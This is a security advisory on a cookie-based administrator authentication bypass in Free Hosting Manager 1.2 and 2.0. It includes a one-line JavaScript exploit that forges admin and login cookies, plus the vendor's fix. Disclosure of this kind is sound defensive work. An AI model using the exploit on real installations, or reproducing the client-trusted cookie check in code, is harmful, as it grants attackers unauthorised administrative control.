Free Hosting Manager Administrator Cookie Authentication Bypass Vulnerability

Bugtraq ID:	30580
Class:	Design Error
CVE:	CVE-2008-3557
Remote:	Yes
Local:	No
Published:	Aug 06 2008 12:00AM
Updated:	May 07 2015 05:25PM
Credit:	Scary-Boys
Vulnerable:	Free Hosting Manager Free Hosting Manager 2.0 Free Hosting Manager Free Hosting Manager 1.2
Not Vulnerable:	Free Hosting Manager Free Hosting Manager 2.0.2

Free Hosting Manager Administrator Cookie Authentication Bypass Vulnerability

Free Hosting Manger is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.

Attackers can exploit this vulnerability to gain administrative access to the affected application.

Free Hosting Manager 1.2 and 2.0 are vulnerable; other versions may also be affected.

Free Hosting Manager Administrator Cookie Authentication Bypass Vulnerability

Attackers can exploit this issue via a browser.

The following example JavaScript code is available:

javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";

Free Hosting Manager Administrator Cookie Authentication Bypass Vulnerability

Solution:
The vendor released version 2.0.2 to address this issue. Please see the references and visit the vendors webpage to obtain this version.

Free Hosting Manager Administrator Cookie Authentication Bypass Vulnerability

References:

• Free Hosting Manager Homepage (Free Hosting Manager)